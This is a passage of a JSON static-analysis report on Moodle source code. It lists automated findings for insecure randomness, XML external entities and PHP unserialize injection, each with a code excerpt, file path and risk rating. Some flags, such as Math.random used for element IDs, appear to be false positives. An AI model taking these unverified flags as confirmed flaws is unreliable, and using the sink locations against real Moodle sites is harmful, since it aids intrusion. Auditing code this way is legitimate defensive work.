"APPCUT:62:14622", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/CryptoInsecureRandomness.html", "positionInStartLine": 56, "patternDescription": "Standard static pseudorandom number generators are very easily predictable, which lower the cryptographic defense of the application.", "appercutVulnerName": "Using Insufficiently Random Generators in Cryptography", "endLineNumber": 316, "positionInEndLine": 58, "startLineNumber": 316, "patternCodeLanguage": "JavaScript", "appercutRisk": "LOW"}, {"sourceFileName": "moodle/lib/editor/atto/yui/build/moodle-editor_atto-rangy/moodle-editor_atto-rangy.js", "code": " function gEBI(id, doc) {\n return (doc || document).getElementById(id);\n }\n\n function insertRangeBoundaryMarker(range, atStart) {\n var markerId = \"selectionBoundary_\" + (+new Date()) + \"_\" + (\"\" + Math.random()).slice(2);\n var markerEl;\n var doc = dom.getDocument(range.startContainer);\n\n // Clone the Range and collapse to the appropriate boundary point\n var boundaryRange = range.cloneRange();\n", "vulnerId": "APPCUT:62:14615", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/CryptoInsecureRandomness.html", "positionInStartLine": 89, "patternDescription": "Standard static pseudorandom number generators are very easily predictable, which lower the cryptographic defense of the application.", "appercutVulnerName": "Using Insufficiently Random Generators in Cryptography", "endLineNumber": 3868, "positionInEndLine": 91, "startLineNumber": 3868, "patternCodeLanguage": "JavaScript", "appercutRisk": "LOW"}, {"sourceFileName": "moodle/lib/editor/atto/yui/build/moodle-editor_atto-rangy/moodle-editor_atto-rangy-debug.js", "code": " function gEBI(id, doc) {\n return (doc || document).getElementById(id);\n }\n\n function insertRangeBoundaryMarker(range, atStart) {\n var markerId = \"selectionBoundary_\" + (+new Date()) + \"_\" + (\"\" + Math.random()).slice(2);\n var markerEl;\n var doc = dom.getDocument(range.startContainer);\n\n // Clone the Range and collapse to the appropriate boundary point\n var boundaryRange = range.cloneRange();\n", "vulnerId": "APPCUT:62:14608", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/CryptoInsecureRandomness.html", "positionInStartLine": 89, "patternDescription": "Standard static pseudorandom number generators are very easily predictable, which lower the cryptographic defense of the application.", "appercutVulnerName": "Using Insufficiently Random Generators in Cryptography", "endLineNumber": 3868, "positionInEndLine": 91, "startLineNumber": 3868, "patternCodeLanguage": "JavaScript", "appercutRisk": "LOW"}, {"sourceFileName": "moodle/question/type/ddmarker/yui/build/moodle-qtype_ddmarker-dd/moodle-qtype_ddmarker-dd-debug.js", "code": " */\nY.extend(DDMARKER_QUESTION, M.qtype_ddmarker.dd_base_class, {\n touchscrolldisable: null,\n pendingid: '',\n initializer : function() {\n this.pendingid = 'qtype_ddmarker-' + Math.random().toString(36).slice(2); // Random string.\n M.util.js_pending(this.pendingid);\n this.doc = this.doc_structure(this);\n this.poll_for_image_load(null, false, 0, this.after_image_load);\n this.doc.bg_img().after('load', this.poll_for_image_load, this,\n false, 0, this.after_image_load);\n", "vulnerId": "APPCUT:62:14627", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/CryptoInsecureRandomness.html", "positionInStartLine": 56, "patternDescription": "Standard static pseudorandom number generators are very easily predictable, which lower the cryptographic defense of the application.", "appercutVulnerName": "Using Insufficiently Random Generators in Cryptography", "endLineNumber": 316, "positionInEndLine": 58, "startLineNumber": 316, "patternCodeLanguage": "JavaScript", "appercutRisk": "LOW"}, {"sourceFileName": "moodle/question/type/ddimageortext/yui/src/form/js/form.js", "code": "Y.extend(DDIMAGEORTEXT_FORM, M.qtype_ddimageortext.dd_base_class, {\n pendingid: '',\n fp : null,\n\n initializer : function() {\n this.pendingid = 'qtype_ddimageortext-form-' + Math.random().toString(36).slice(2); // Random string.\n M.util.js_pending(this.pendingid);\n this.fp = this.file_pickers();\n var tn = Y.one(this.get('topnode'));\n tn.one('div.fcontainer').append('<div class=\"ddarea\"><div class=\"droparea\"></div><div class=\"dragitems\"></div>' +\n '<div class=\"dropzones\"></div></div>');\n", "vulnerId": "APPCUT:62:14592", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/CryptoInsecureRandomness.html", "positionInStartLine": 66, "patternDescription": "Standard static pseudorandom number generators are very easily predictable, which lower the cryptographic defense of the application.", "appercutVulnerName": "Using Insufficiently Random Generators in Cryptography", "endLineNumber": 29, "positionInEndLine": 68, "startLineNumber": 29, "patternCodeLanguage": "JavaScript", "appercutRisk": "LOW"}, {"sourceFileName": "moodle/question/type/ddmarker/yui/build/moodle-qtype_ddmarker-form/moodle-qtype_ddmarker-form-debug.js", "code": "};\nY.extend(DDMARKER_FORM, M.qtype_ddmarker.dd_base_class, {\n fp : null,\n\n initializer : function() {\n var pendingid = 'qtype_ddmarker-form-' + Math.random().toString(36).slice(2); // Random string.\n M.util.js_pending(pendingid);\n this.fp = this.file_pickers();\n var tn = Y.one(this.get('topnode'));\n tn.one('div.fcontainer').append(\n '<div class=\"ddarea\">' +\n", "vulnerId": "APPCUT:62:14620", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/CryptoInsecureRandomness.html", "positionInStartLine": 60, "patternDescription": "Standard static pseudorandom number generators are very easily predictable, which lower the cryptographic defense of the application.", "appercutVulnerName": "Using Insufficiently Random Generators in Cryptography", "endLineNumber": 29, "positionInEndLine": 62, "startLineNumber": 29, "patternCodeLanguage": "JavaScript", "appercutRisk": "LOW"}]}, {"pageNumber": 15, "vulnerabilities": [{"sourceFileName": "moodle/lib/boxlib.php", "code": " $params['auth_token'] = $this->auth_token;\n $params['api_key'] = $this->api_key;\n $http = new curl(array('debug'=>$this->debug));\n $xml = $http->get($this->_box_api_url, $params, array('timeout' => $timeout));\n if (!$http->get_errno()) {\n $o = simplexml_load_string(trim($xml));\n if ($o->status == 's_get_file_info') {\n return $o->info;\n }\n }\n return null;\n", "vulnerId": "APPCUT:62:14601", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/XmlXxe.html", "positionInStartLine": 17, "patternDescription": "If the application allows the use of external entities in user XML documents, then a malicious user can gain access to previously unavailable resources through these entities. Depending on the application architecture, the malicious user can use the external entities for network interaction or reading files.", "appercutVulnerName": "\u00a0 Incorrect Permissions for External Entities During XML Document Processing", "endLineNumber": 452, "positionInEndLine": 50, "startLineNumber": 452, "patternCodeLanguage": "PHP", "appercutRisk": "MEDIUM"}, {"sourceFileName": "moodle/lib/lessphp/Parser.php", "code": "\t\t\t\tswitch(Less_Parser::$options['cache_method']){\n\n\t\t\t\t\t// Using serialize\n\t\t\t\t\t// Faster but uses more memory\n\t\t\t\t\tcase 'serialize':\n\t\t\t\t\t\t$cache = unserialize(file_get_contents($cache_file));\n\t\t\t\t\t\tif( $cache ){\n\t\t\t\t\t\t\ttouch($cache_file);\n\t\t\t\t\t\t\t$this->UnsetInput();\n\t\t\t\t\t\t\treturn $cache;\n\t\t\t\t\t\t}\n", "vulnerId": "APPCUT:62:14556", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/InjectionUnserialize.html", "positionInStartLine": 15, "patternDescription": "The \u2018serialize\u2019 function is used to display PHP variables as strings. The \u2018unserialize\u2019 function does the reverse transformation. If user data is used when calling the \u2018unserialize\u2019 function, the malicious user can create and initialize variables in the context of application names, which can lead to a breach of application logic, or even remote code execution.", "appercutVulnerName": "Incorrect User Input Filtration when Using the unserialize Function", "endLineNumber": 524, "positionInEndLine": 58, "startLineNumber": 524, "patternCodeLanguage": "PHP", "appercutRisk": "MEDIUM"}, {"sourceFileName": "moodle/lib/testing/classes/util.php", "code": " // Not initialised yet.\n return array();\n }\n\n $data = file_get_contents($structurefile);\n self::$tablestructure = unserialize($data);\n }\n\n if (!is_array(self::$tablestructure)) {\n testing_error(1, 'Can not read dataroot/' . $framework . '/tablestructure.ser or invalid format, reinitialize test database.');\n }\n", "vulnerId": "APPCUT:62:14542", "functionName": "None", "appercutAttackItems": [{"sourceFileName": "moodle/lib/testing/classes/util.php", "code": " // Not initialised yet.\n return array();\n }\n\n $data = file_get_contents($structurefile);\n self::$tablestructure = unserialize($data);\n }\n\n if (!is_array(self::$tablestructure)) {\n testing_error(1, 'Can not read dataroot/' . $framework . '/tablestructure.ser or invalid format, reinitialize test database.');\n }\n", "functionName": "Global.testing_util::get_tablestructure", "endLineNumber": 313, "positionInStartLine": 36, "positionInEndLine": 54, "appercutAttackItemId": 9009, "startLineNumber": 313}, {"sourceFileName": "moodle/lib/testing/classes/util.php", "code": " if (!file_exists($structurefile)) {\n // Not initialised yet.\n return array();\n }\n\n $data = file_get_contents($structurefile);\n self::$tablestructure = unserialize($data);\n }\n\n if (!is_array(self::$tablestructure)) {\n testing_error(1, 'Can not read dataroot/' . $framework . '/tablestructure.ser or invalid format, reinitialize test database.');\n", "functionName": "Global.testing_util::get_tablestructure", "endLineNumber": 312, "positionInStartLine": 12, "positionInEndLine": 53, "appercutAttackItemId": 9008, "startLineNumber": 312}], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/InjectionUnserialize.html", "positionInStartLine": 36, "patternDescription": "The \u2018serialize\u2019 function is used to display PHP variables as strings. The \u2018unserialize\u2019 function does the reverse transformation. If user data is used when calling the \u2018unserialize\u2019 function, the malicious user can create and initialize variables in the context of application names, which can lead to a breach of application logic, or even remote code execution.", "appercutVulnerName": "Incorrect User Input Filtration when Using the unserialize Function", "endLineNumber": 313, "positionInEndLine": 54, "startLineNumber": 313, "patternCodeLanguage": "PHP", "appercutRisk": "MEDIUM"}, {"sourceFileName": "moodle/lib/simplepie/library/SimplePie/Cache/File.php", "code": "\t */\n\tpublic function load()\n\t{\n\t\tif (file_exists($this->name) && is_readable($this->name))\n\t\t{\n\t\t\treturn unserialize(file_get_contents($this->name));\n\t\t}\n\t\treturn false;\n\t}\n\n\t/**\n", "vulnerId": "APPCUT:62:14547", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/InjectionUnserialize.html", "positionInStartLine": 10, "patternDescription": "The \u2018serialize\u2019 function is used to display PHP variables as strings. The \u2018unserialize\u2019 function does the reverse transformation. If user data is used when calling the \u2018unserialize\u2019 function, the malicious user can create and initialize variables in the context of application names, which can lead to a breach of application logic, or even remote code execution.", "appercutVulnerName": "Incorrect User Input Filtration when Using the unserialize Function", "endLineNumber": 127, "positionInEndLine": 53, "startLineNumber": 127, "patternCodeLanguage": "PHP", "appercutRisk": "MEDIUM"}, {"sourceFileName": "moodle/lib/typo3/class.t3lib_cs.php", "code": "\t\t\tif ($charset && t3lib_div::validPathStr($charsetConvTableFile) && @is_file($charsetConvTableFile)) {\n\t\t\t\t\t// Cache file for charsets:\n\t\t\t\t\t// Caching brought parsing time for gb2312 down from 2400 ms to 150 ms. For other charsets we are talking 11 ms down to zero.\n\t\t\t\t$cacheFile = t3lib_div::getFileAbsFileName('typo3temp/cs/charset_' . $charset . '.tbl');\n\t\t\t\tif ($cacheFile && @is_file($cacheFile)) {\n\t\t\t\t\t$this->parsedCharsets[$charset] = unserialize(t3lib_div::getUrl($cacheFile));\n\t\t\t\t} else {\n\t\t\t\t\t\t// Parse conversion table into lines:\n\t\t\t\t\t$lines = t3lib_div::trimExplode(LF, t3lib_div::getUrl($charsetConvTableFile), 1);\n\t\t\t\t\t\t// Initialize the internal variable holding the conv. table:\n\t\t\t\t\t$this->parsedCharsets[$charset] = array('local' => array(), 'utf8' => array());\n", "vulnerId": "APPCUT:62:14550", "functionName": "None", "appercutAttackItems": [{"sourceFileName": "moodle/lib/typo3/class.t3lib_div.php", "code": "\t\t\t\t$report['error'] = -1;\n\t\t\t\t$report['message'] = 'Couldn\\'t get URL: ' . implode(LF, $http_response_header);\n\t\t\t}\n\t\t}\n\n\t\treturn $content;\n\t}\n\n\t/**\n\t * Writes $content to the file $file\n\t *\n", "functionName": "Global.t3lib_div::getUrl", "endLineNumber": 2766, "positionInStartLine": 2, "positionInEndLine": 17, "appercutAttackItemId": 9026, "startLineNumber": 2766}, {"sourceFileName": "moodle/lib/typo3/class.t3lib_div.php", "code": "\t\t} else {\n\t\t\tif (isset($report)) {\n\t\t\t\t$report['lib'] = 'file';\n\t\t\t}\n\n\t\t\t$content = @file_get_contents($url);\n\n\t\t\tif ($content === FALSE && isset($report)) {\n\t\t\t\t$report['error'] = -1;\n\t\t\t\t$report['message'] = 'Couldn\\'t get URL: ' . implode(LF, $http_response_header);\n\t\t\t}\n", "functionName": "Global.t3lib_div::getUrl", "endLineNumber": 2758, "positionInStartLine": 3, "positionInEndLine": 38, "appercutAttackItemId": 9025, "startLineNumber": 2758}, {"sourceFileName": "moodle/lib/typo3/class.t3lib_cs.php", "code": "\t\t\tif ($charset && t3lib_div::validPathStr($charsetConvTableFile) && @is_file($charsetConvTableFile)) {\n\t\t\t\t\t// Cache file for charsets:\n\t\t\t\t\t// Caching brought parsing time for gb2312 down from 2400 ms to 150 ms. For other charsets we are talking 11 ms down to zero.\n\t\t\t\t$cacheFile = t3lib_div::getFileAbsFileName('typo3temp/cs/charset_' . $charset . '.tbl');\n\t\t\t\tif ($cacheFile && @is_file($cacheFile)) {\n\t\t\t\t\t$this->parsedCharsets[$charset] = unserialize(t3lib_div::getUrl($cacheFile));\n\t\t\t\t} else {\n\t\t\t\t\t\t// Parse conversion table into lines:\n\t\t\t\t\t$lines = t3lib_div::trimExplode(LF, t3lib_div::getUrl($charsetConvTableFile), 1);\n\t\t\t\t\t\t// Initialize the internal variable holding the conv. table:\n\t\t\t\t\t$this->parsedCharsets[$charset] = array('local' => array(), 'utf8' => array());\n", "functionName": "Global.t3lib_cs::initCharset", "endLineNumber": 1033, "positionInStartLine": 39, "positionInEndLine": 81, "appercutAttackItemId": 9027, "startLineNumber": 1033}], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/InjectionUnserialize.html", "positionInStartLine": 39, "patternDescription": "The \u2018serialize\u2019 function is used to display PHP variables as strings. The \u2018unserialize\u2019 function does the reverse transformation. If user data is used when calling the \u2018unserialize\u2019 function, the malicious user can create and initialize variables in the context of application names, which can lead to a breach of application logic, or even remote code execution.", "appercutVulnerName": "Incorrect User Input Filtration when Using the unserialize Function", "endLineNumber": 1033, "positionInEndLine": 81, "startLineNumber": 1033, "patternCodeLanguage": "PHP", "appercutRisk": "MEDIUM"}, {"sourceFileName": "moodle/lib/typo3/class.t3lib_div.php", "code": "\t\t\t\t\t\t1270853901\n\t\t\t\t\t);\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\t\t// Get content from cache:\n\t\t\t\t$serContent = unserialize(self::getUrl($cacheFileName));\n\t\t\t\t$LOCAL_LANG = $serContent['LOCAL_LANG'];\n\t\t\t}\n\n\t\t\treturn $LOCAL_LANG;\n\t\t}\n", "vulnerId": "APPCUT:62:14553", "functionName": "None", "appercutAttackItems": [{"sourceFileName": "moodle/lib/typo3/class.t3lib_div.php", "code": "\t\t\t\t$report['error'] = -1;\n\t\t\t\t$report['message'] = 'Couldn\\'t get URL: ' . implode(LF, $http_response_header);\n\t\t\t}\n\t\t}\n\n\t\treturn $content;\n\t}\n\n\t/**\n\t * Writes $content to the file $file\n\t *\n", "functionName": "Global.t3lib_div::getUrl", "endLineNumber": 2766, "positionInStartLine": 2, "positionInEndLine": 17, "appercutAttackItemId": 9029, "startLineNumber": 2766}, {"sourceFileName": "moodle/lib/typo3/class.t3lib_div.php", "code": "\t\t\t\t\t\t1270853901\n\t\t\t\t\t);\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\t\t// Get content from cache:\n\t\t\t\t$serContent = unserialize(self::getUrl($cacheFileName));\n\t\t\t\t$LOCAL_LANG = $serContent['LOCAL_LANG'];\n\t\t\t}\n\n\t\t\treturn $LOCAL_LANG;\n\t\t}\n", "functionName": "Global.t3lib_div::readLLPHPfile", "endLineNumber": 4317, "positionInStartLine": 18, "positionInEndLine": 59, "appercutAttackItemId": 9030, "startLineNumber": 4317}, {"sourceFileName": "moodle/lib/typo3/class.t3lib_div.php", "code": "\t\t} else {\n\t\t\tif (isset($report)) {\n\t\t\t\t$report['lib'] = 'file';\n\t\t\t}\n\n\t\t\t$content = @file_get_contents($url);\n\n\t\t\tif ($content === FALSE && isset($report)) {\n\t\t\t\t$report['error'] = -1;\n\t\t\t\t$report['message'] = 'Couldn\\'t get URL: ' . implode(LF, $http_response_header);\n\t\t\t}\n", "functionName": "Global.t3lib_div::getUrl", "endLineNumber": 2758, "positionInStartLine": 3, "positionInEndLine": 38, "appercutAttackItemId": 9028, "startLineNumber": 2758}], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/InjectionUnserialize.html", "positionInStartLine": 18, "patternDescription": "The \u2018serialize\u2019 function is used to display PHP variables as strings. The \u2018unserialize\u2019 function does the reverse transformation. If user data is used when calling the \u2018unserialize\u2019 function, the malicious user can create and initialize variables in the context of application names, which can lead to a breach of application logic, or even remote code execution.", "appercutVulnerName": "Incorrect User Input Filtration when Using the unserialize Function", "endLineNumber": 4317, "positionInEndLine": 59, "startLineNumber": 4317, "patternCodeLanguage": "PHP", "appercutRisk": "MEDIUM"}, {"sourceFileName": "moodle/lib/typo3/class.t3lib_cs.php", "code": "\t\t}\n\n\t\t\t// Use cached version if possible\n\t\t$cacheFile = t3lib_div::getFileAbsFileName('typo3temp/cs/cscase_' . $charset . '.tbl');\n\t\tif ($cacheFile && @is_file($cacheFile)) {\n\t\t\t$this->caseFolding[$charset] = unserialize(t3lib_div::getUrl($cacheFile));\n\t\t\treturn 2;\n\t\t}\n\n\t\t\t// init UTF-8 conversion for this charset\n\t\tif (!$this->initCharset($charset)) {\n", "vulnerId": "APPCUT:62:14543", "functionName": "None", "appercutAttackItems": [{"sourceFileName": "moodle/lib/typo3/class.t3lib_div.php", "code": "\t\t\t\t$report['error'] = -1;\n\t\t\t\t$report['message'] = 'Couldn\\'t get URL: ' . implode(LF, $http_response_header);\n\t\t\t}\n\t\t}\n\n\t\treturn $content;\n\t}\n\n\t/**\n\t * Writes $content to the file $file\n\t *\n", "functionName": "Global.t3lib_div::getUrl", "endLineNumber": 2766, "positionInStartLine": 2, "positionInEndLine": 17, "appercutAttackItemId": 9011, "startLineNumber": 2766}, {"sourceFileName": "moodle/lib/typo3/class.t3lib_div.php", "code": "\t\t} else {\n\t\t\tif (isset($report)) {\n\t\t\t\t$report['lib'] = 'file';\n\t\t\t}\n\n\t\t\t$content = @file_get_contents($url);\n\n\t\t\tif ($content === FALSE && isset($report)) {\n\t\t\t\t$report['error'] = -1;\n\t\t\t\t$report['message'] = 'Couldn\\'t get URL: ' . implode(LF, $http_response_header);\n\t\t\t}\n", "functionName": "Global.t3lib_div::getUrl", "endLineNumber": 2758, "positionInStartLine": 3, "positionInEndLine": 38, "appercutAttackItemId": 9010, "startLineNumber": 2758}, {"sourceFileName": "moodle/lib/typo3/class.t3lib_cs.php", "code": "\t\t}\n\n\t\t\t// Use cached version if possible\n\t\t$cacheFile = t3lib_div::getFileAbsFileName('typo3temp/cs/cscase_' . $charset . '.tbl');\n\t\tif ($cacheFile && @is_file($cacheFile)) {\n\t\t\t$this->caseFolding[$charset] = unserialize(t3lib_div::getUrl($cacheFile));\n\t\t\treturn 2;\n\t\t}\n\n\t\t\t// init UTF-8 conversion for this charset\n\t\tif (!$this->initCharset($charset)) {\n", "functionName": "Global.t3lib_cs::initCaseFolding", "endLineNumber": 1355, "positionInStartLine": 34, "positionInEndLine": 76, "appercutAttackItemId": 9012, "startLineNumber": 1355}], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/InjectionUnserialize.html", "positionInStartLine": 34, "patternDescription": "The \u2018serialize\u2019 function is used to display PHP variables as strings. The \u2018unserialize\u2019 function does the reverse transformation. If user data is used when calling the \u2018unserialize\u2019 function, the malicious user can create and initialize variables in the context of application names, which can lead to a breach of application logic, or even remote code execution.", "appercutVulnerName": "Incorrect User Input Filtration when Using the unserialize Function", "endLineNumber": 1355, "positionInEndLine": 76, "startLineNumber": 1355, "patternCodeLanguage": "PHP", "appercutRisk": "MEDIUM"}, {"sourceFileName": "moodle/cache/stores/file/lib.php", "code": " * @param string $data\n * @return mixed\n * @throws coding_exception\n */\n protected function prep_data_after_read($data) {\n $result = @unserialize($data);\n if ($result === false) {\n throw new coding_exception('Failed to unserialise data from file. Either failed to read, or failed to write.');\n }\n return $result;\n }\n", "vulnerId": "APPCUT:62:14549", "functionName": "None", "appercutAttackItems": [{"sourceFileName": "moodle/cache/stores/file/lib.php", "code": " * @param string $data\n * @return mixed\n * @throws coding_exception\n */\n protected function prep_data_after_read($data) {\n $result = @unserialize($data);\n if ($result === false) {\n throw new coding_exception('Failed to unserialise data from file. Either failed to read, or failed to write.');\n }\n return $result;\n }\n", "functionName": "Global.cachestore_file::prep_data_after_read", "endLineNumber": 468, "positionInStartLine": 19, "positionInEndLine": 37, "appercutAttackItemId": 9024, "startLineNumber": 468}, {"sourceFileName": "moodle/cache/stores/file/lib.php", "code": " $data .= fread($handle, 1048576);\n } while (!feof($handle));\n // Unlock it.\n flock($handle, LOCK_UN);\n // Return it unserialised.\n return $this->prep_data_after_read($data);\n }\n\n /**\n * Retrieves several items from the cache store in a single transaction.\n *\n", "functionName": "Global.cachestore_file::get", "endLineNumber": 373, "positionInStartLine": 22, "positionInEndLine": 49, "appercutAttackItemId": 9023, "startLineNumber": 373}, {"sourceFileName": "moodle/cache/stores/file/lib.php", "code": " flock($handle, LOCK_SH);\n $data = '';\n // Read the data in 1Mb chunks. Small caches will not loop more than once. We don't use filesize as it may\n // be cached with a different value than what we need to read from the file.\n do {\n $data .= fread($handle, 1048576);\n } while (!feof($handle));\n // Unlock it.\n flock($handle, LOCK_UN);\n // Return it unserialised.\n return $this->prep_data_after_read($data);\n", "functionName": "Global.cachestore_file::get", "endLineNumber": 368, "positionInStartLine": 12, "positionInEndLine": 44, "appercutAttackItemId": 9022, "startLineNumber": 368}], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/InjectionUnserialize.html", "positionInStartLine": 19, "patternDescription": "The \u2018serialize\u2019 function is used to display PHP variables as strings. The \u2018unserialize\u2019 function does the reverse transformation. If user data is used when calling the \u2018unserialize\u2019 function, the malicious user can create and initialize variables in the context of application names, which can lead to a breach of application logic, or even remote code execution.", "appercutVulnerName": "Incorrect User Input Filtration when Using the unserialize Function", "endLineNumber": 468, "positionInEndLine": 37, "startLineNumber": 468, "patternCodeLanguage": "PHP", "appercutRisk": "MEDIUM"}, {"sourceFileName": "moodle/lib/typo3/class.t3lib_div.php", "code": "\t\t\t\t\t\t\t\t1270853905\n\t\t\t\t\t\t\t);\n\t\t\t\t\t\t}\n\t\t\t\t\t} else {\n\t\t\t\t\t\t\t// Get content from cache:\n\t\t\t\t\t\t$serContent = unserialize(self::getUrl($cacheFileName));\n\t\t\t\t\t\t$LOCAL_LANG[$langKey] = $serContent['EXT_DATA'];\n\t\t\t\t\t}\n\t\t\t\t} else {\n\t\t\t\t\t$LOCAL_LANG[$langKey] = array();\n\t\t\t\t}\n", "vulnerId": "APPCUT:62:14544", "functionName": "None", "appercutAttackItems": [{"sourceFileName": "moodle/lib/typo3/class.t3lib_div.php", "code": "\t\t\t\t$report['error'] = -1;\n\t\t\t\t$report['message'] = 'Couldn\\'t get URL: ' . implode(LF, $http_response_header);\n\t\t\t}\n\t\t}\n\n\t\treturn $content;\n\t}\n\n\t/**\n\t * Writes $content to the file $file\n\t *\n", "functionName": "Global.t3lib_div::getUrl", "endLineNumber": 2766, "positionInStartLine": 2, "positionInEndLine": 17, "appercutAttackItemId": 9014, "startLineNumber": 2766}, {"sourceFileName": "moodle/lib/typo3/class.t3lib_div.php", "code": "\t\t} else {\n\t\t\tif (isset($report)) {\n\t\t\t\t$report['lib'] = 'file';\n\t\t\t}\n\n\t\t\t$content = @file_get_contents($url);\n\n\t\t\tif ($content === FALSE && isset($report)) {\n\t\t\t\t$report['error'] = -1;\n\t\t\t\t$report['message'] = 'Couldn\\'t get URL: ' . implode(LF, $http_response_header);\n\t\t\t}\n", "functionName": "Global.t3lib_div::getUrl", "endLineNumber": 2758, "positionInStartLine": 3, "positionInEndLine": 38, "appercutAttackItemId": 9013, "startLineNumber": 2758}, {"sourceFileName": "moodle/lib/typo3/class.t3lib_div.php", "code": "\t\t\t\t\t\t\t\t1270853905\n\t\t\t\t\t\t\t);\n\t\t\t\t\t\t}\n\t\t\t\t\t} else {\n\t\t\t\t\t\t\t// Get content from cache:\n\t\t\t\t\t\t$serContent = unserialize(self::getUrl($cacheFileName));\n\t\t\t\t\t\t$LOCAL_LANG[$langKey] = $serContent['EXT_DATA'];\n\t\t\t\t\t}\n\t\t\t\t} else {\n\t\t\t\t\t$LOCAL_LANG[$langKey] = array();\n\t\t\t\t}\n", "functionName": "Global.t3lib_div::readLLXMLfile", "endLineNumber": 4472, "positionInStartLine": 20, "positionInEndLine": 61, "appercutAttackItemId": 9015, "startLineNumber": 4472}], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/InjectionUnserialize.html", "positionInStartLine": 20, "patternDescription": "The \u2018serialize\u2019 function is used to display PHP variables as strings. The \u2018unserialize\u2019 function does the reverse transformation. If user data is used when calling the \u2018unserialize\u2019 function, the malicious user can create and initialize variables in the context of application names, which can lead to a breach of application logic, or even remote code execution.", "appercutVulnerName": "Incorrect User Input Filtration when Using the unserialize Function", "endLineNumber": 4472, "positionInEndLine": 61, "startLineNumber": 4472, "patternCodeLanguage": "PHP", "appercutRisk": "MEDIUM"}, {"sourceFileName": "moodle/lib/adodb/adodb-csvlib.inc.php", "code": "\t\twhile ($txt = fread($fp,$MAXSIZE)) {\n\t\t\t$text .= $txt;\n\t\t}\n\n\t\tfclose($fp);\n\t\t@$arr = unserialize($text);\n\t\t//var_dump($arr);\n\t\tif (!is_array($arr)) {\n\t\t\t$err = \"Recordset had unexpected EOF (in serialized recordset)\";\n\t\t\tif (get_magic_quotes_runtime()) $err .= \". Magic Quotes Runtime should be disabled!\";\n\t\t\treturn $false;\n", "vulnerId": "APPCUT:62:14548", "functionName": "None", "appercutAttackItems": [{"sourceFileName": "moodle/lib/adodb/adodb-csvlib.inc.php", "code": "\t\t// slurp in the data\n\t\t$MAXSIZE = 128000;\n\n\t\t$text = '';\n\t\twhile ($txt = fread($fp,$MAXSIZE)) {\n\t\t\t$text .= $txt;\n\t\t}\n\n\t\tfclose($fp);\n\t\t@$arr = unserialize($text);\n\t\t//var_dump($arr);\n", "functionName": "Global.GlobalContext::csv2rs", "endLineNumber": 247, "positionInStartLine": 3, "positionInEndLine": 16, "appercutAttackItemId": 9020, "startLineNumber": 247}, {"sourceFileName": "moodle/lib/adodb/adodb-csvlib.inc.php", "code": "\t\twhile ($txt = fread($fp,$MAXSIZE)) {\n\t\t\t$text .= $txt;\n\t\t}\n\n\t\tfclose($fp);\n\t\t@$arr = unserialize($text);\n\t\t//var_dump($arr);\n\t\tif (!is_array($arr)) {\n\t\t\t$err = \"Recordset had unexpected EOF (in serialized recordset)\";\n\t\t\tif (get_magic_quotes_runtime()) $err .= \". Magic Quotes Runtime should be disabled!\";\n\t\t\treturn $false;\n", "functionName": "Global.GlobalContext::csv2rs", "endLineNumber": 251, "positionInStartLine": 10, "positionInEndLine": 28, "appercutAttackItemId": 9021, "startLineNumber": 251}, {"sourceFileName": "moodle/lib/adodb/adodb-csvlib.inc.php", "code": "\n\t\t// slurp in the data\n\t\t$MAXSIZE = 128000;\n\n\t\t$text = '';\n\t\twhile ($txt = fread($fp,$MAXSIZE)) {\n\t\t\t$text .= $txt;\n\t\t}\n\n\t\tfclose($fp);\n\t\t@$arr = unserialize($text);\n", "functionName": "Global.GlobalContext::csv2rs", "endLineNumber": 246, "positionInStartLine": 9, "positionInEndLine": 35, "appercutAttackItemId": 9019, "startLineNumber": 246}], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/InjectionUnserialize.html", "positionInStartLine": 10, "patternDescription": "The \u2018serialize\u2019 function is used to display PHP variables as strings. The \u2018unserialize\u2019 function does the reverse transformation. If user data is used when calling the \u2018unserialize\u2019 function, the malicious user can create and initialize variables in the context of application names, which can lead to a breach of application logic, or even remote code execution.", "appercutVulnerName": "Incorrect User Input Filtration when Using the unserialize Function", "endLineNumber": 251, "positionInEndLine": 28, "startLineNumber": 251, "patternCodeLanguage": "PHP", "appercutRisk": "MEDIUM"}, {"sourceFileName": "moodle/lib/typo3/class.t3lib_cs.php", "code": "\t\t}\n\n\t\t\t// Use cached version if possible\n\t\t$cacheFile = t3lib_div::getFileAbsFileName('typo3temp/cs/csascii_' . $charset . '.tbl');\n\t\tif ($cacheFile && @is_file($cacheFile)) {\n\t\t\t$this->toASCII[$charset] = unserialize(t3lib_div::getUrl($cacheFile));\n\t\t\treturn 2;\n\t\t}\n\n\t\t\t// init UTF-8 conversion for this charset\n\t\tif (!$this->initCharset($charset)) {\n", "vulnerId": "APPCUT:62:14540", "functionName": "None", "appercutAttackItems": [{"sourceFileName": "moodle/lib/typo3/class.t3lib_div.php", "code": "\t\t\t\t$report['error'] = -1;\n\t\t\t\t$report['message'] = 'Couldn\\'t get URL: ' . implode(LF, $http_response_header);\n\t\t\t}\n\t\t}\n\n\t\treturn $content;\n\t}\n\n\t/**\n\t * Writes $content to the file $file\n\t *\n", "functionName": "Global.t3lib_div::getUrl", "endLineNumber": 2766, "positionInStartLine": 2, "positionInEndLine": 17, "appercutAttackItemId": 9004, "startLineNumber": 2766}, {"sourceFileName": "moodle/lib/typo3/class.t3lib_div.php", "code": 